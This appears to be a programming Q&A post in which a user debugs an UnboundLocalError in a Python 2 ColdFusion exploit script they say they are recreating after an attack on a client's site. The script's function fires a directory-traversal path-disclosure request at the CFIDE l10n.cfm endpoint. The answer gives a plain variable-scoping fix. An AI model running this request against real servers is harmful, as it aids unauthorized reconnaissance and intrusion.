# UnboundLocalError: Local Variable 'abspath' referenced before assignment

Tags: python-2.7

I'm trying to recreate a exploit used on my clients website.
I spoke to the security analyst earlier and said he would take a look into it when he's back on jan 8.

Here's the part of code that i'm getting errors in:

```
def getpath(protocol,target):
# Leverage a path disclosure to get the absolute path on CF9-10
print "[*] Testing for path disclosure"
abspathdata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).headers
if "set-cookie" in abspathdata.keys():
    try:
        abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0])
        print "[*] Absolute path obtained: %s" % abspath
        if abspath[0] == "/":
            print "[*] Detected Linux"
            operatingsystem = "linux"
        elif abspath[1] == ":":
            print "[*] Detected Windows"
            operatingsystem = "windows 95 with bonzibuddy"
        else:
            print "[?] t4rg3t 4pp34r5 t0 b3 runn1n9 0n 4 r3fr1g3r4t0r"
            operatingsystem = "refrigerator"
    except:
        print "[?] OS detection failure. Continuing with fingerprint."
else:
    print "[?] OS detection failure. Continuing with fingerprint."
return abspath,operatingsystem
```

and

```
abspath,operatingsystem = getpath(protocol,target)
coldfusion = fingerprintcf(protocol,target)
```

The error i get:

```
Traceback (most recent call last):
  File "C:\Python27\Scripts\cf.py", line 110, in <module>
    abspath,operatingsystem = getpath(protocol,target)
  File "C:\Python27\Scripts\cf.py", line 78, in getpath
    return abspath,operatingsystem
UnboundLocalError: local variable 'abspath' referenced before assignment
```

Answer (score 0):

You're only assigning an `abspath` variable in one branch of your code. If the first condition (`"set-cookie" in abspathdata.keys()`) is false (or if something in the `urllib.unqote` expression raises an exception), the variable is never given a value. When you then try to return it, you get the exception you describe.

I don't understand your code well enough to suggest what you should return in such an error case, but presumably it should be something. Here's an example of how you might fix the code (returning a nonsense path):

```
if "set-cookie" in abspathdata.keys():
    try:
        abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0])
        # I'll skip lots of stuff here
    except:
        print "[?] OS detection failure. Continuing with fingerprint."
        abspath = "invalid!" # don't forget this case either!
else:
    print "[?] OS detection failure. Continuing with fingerprint."
    abspath = "invalid!"
return abspath,operatingsystem
```

Note that raising an exception may be more appropriate than returning nonsense.